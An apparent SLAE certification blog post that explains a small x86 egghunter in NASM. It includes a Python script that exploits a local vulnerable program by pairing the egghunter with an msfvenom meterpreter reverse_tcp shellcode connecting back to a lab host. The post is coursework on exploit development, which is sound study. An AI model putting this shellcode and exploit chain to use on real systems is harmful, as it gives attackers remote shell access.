SLAE: 0x3 Egghunters
Sun 02 April 2017
0x1 Requirements
Write a custom egghunter that works with custom shellcode
Writing a custom egghunter that will use the address pointed to in esp as a starting point and go up or down depending on if the first command in the loop function is increase by 1 or substract by 1
While looking through examples on shellstorm I saw the idea of substracting 1 byte from the egg itself in order to avoid a duplicate egg in the completed shellcode which I found nice so I've implemented this in my egghunter.
0x2 Demo: putting it all together
0x3 Code walkthrough
; Filename: small_egghunter.nasm
; Author: Plaix
; Website: http://slacklabs.be
;
; Purpose:
; Searches up or down for our egg, which is only 4 bytes
; Compile:
; --------
;
; nasm -f elf32 -o $small_egghunter.o $template.nasm
; ld -o $small_egghunter $template.o
global _start
section .text
_start:
mov eax,esp ; get an addres on the stack that's valid
; we will mov 0xdeadbeee into ebx instead of our egg
; and inc it by 1 to avoid our egghunter finding the 0xdeadbeef value in ebx
; instead of at the right spot
mov ebx,0xdeadbeee
inc ebx
loop:
inc eax
cmp dword [eax],ebx
jnz loop
; if the egg is found
; play nice with the python script
add eax,0x4
push eax
ret
0x4 Example
I've included a vuln.c program and this python script which will use the egghunter and a generated linux meterpreter reverse_tcp shell to exploit the program
#!/bin/env/python
import os
import subprocess
# egghunter 60 bytes
# shellcode 500 bytes
egg="\xef\xbe\xad\xde"
'''
linux/x86/meterpreter/reverse_tcp LHOST=192.168/56.10 LPORT=4444
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.56.10 -f py -b "\x00\x0a\xff\x60\x22\x27\x28\x29"
482 bytes
'''
buf = ""
buf += "\xd9\xe8\xbf\xf6\xd0\x96\x16\xd9\x74\x24\xf4\x5d\x31"
buf += "\xc9\xb1\x12\x31\x7d\x1a\x03\x7d\x1a\x83\xc5\x04\xe2"
buf += "\x03\xe1\x4d\xe1\x08\x51\x31\x5d\xa4\x54\x05\x07\xb1"
buf += "\xb8\xa8\x48\x56\x61\x5b\x89\xf0\xae\x91\x61\x02\xcf"
buf += "\xb4\x2d\x8b\x2e\xdc\xab\xd3\xe0\x70\x63\x6a\xe1\x30"
buf += "\x46\xec\x50\xb1\xe1\xec\x84\xbe\x11\x65\x47\x7f\xfa"
buf += "\x79\x49\x63\xf1\x31\x34\xa9\x8a\x6a\x4e\xd0\x12\x3a"
buf += "\x5c\xa3\x26\x8f\xdd\x3c\xc9"
shBuf=egg+"\x90"*(500-(len(buf)+4))+buf
print "Prepending shellcode with %i nops..." % (500-(len(buf)+4))
#eggHunter="\x83\xc4\x32\x31\xc0\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x50\x68\x6f\x73\x74\x73\x68\x63\x2f\x2f\x68\x68\x2f\x2f\x65\x74\x89\xe1\x31\xd2\x50\x51\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xb3\x01\xcd\x80"
eggHunter="\x89\xe0\xbb\xee\xbe\xad\xde\x43\x40\x39\x18\x75\xfb\x83\xc0\x04\x50\xc3"
#for x in range(len(shellcode)):
# print "%i\t%s\t\\x%02x" % (x,shellcode[x],ord(shellcode[x]))
EIP="\xf2\x1c\xe4\xb7" # libc JMP eax
eggBuf="\x90"*(60-len(eggHunter))+eggHunter+EIP
# run the exploit
#os.system("gdb -q --args ./vuln "+shBuf+" "+eggBuf)
#os.system("./vuln "+shBuf+" "+ eggBuf)
#subprocess.call('gdb -q --args ./vuln \"'+ shBuf +"\" \""+ eggBuf+"\"",shell=True)
subprocess.call('./vuln \"'+ shBuf +"\" \""+ eggBuf+"\"",shell=True)
0x0 Resources used:
Sysgrok: http://syscalls.kernelgrok.com/
Linux man pages: http://man7.org/linux/man-pages/index.html
shellstorm.org: http://shell-storm.org/shellcode/
exploit-db.com: https://www.exploit-db.com/shellcode/
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE - 827